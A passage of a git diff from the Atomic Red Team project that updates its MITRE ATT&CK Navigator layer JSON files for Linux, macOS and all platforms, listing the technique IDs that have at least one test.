nabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},
{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK 
Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techn
iqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniq
ueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 23c8d246..018c33c7 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true
},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"te
chniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team 
(macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":tru
e},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"t
echniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end 
of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 21e118de..cf3aef14 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"tech
niqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005",
"score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{
"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":
"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"tec
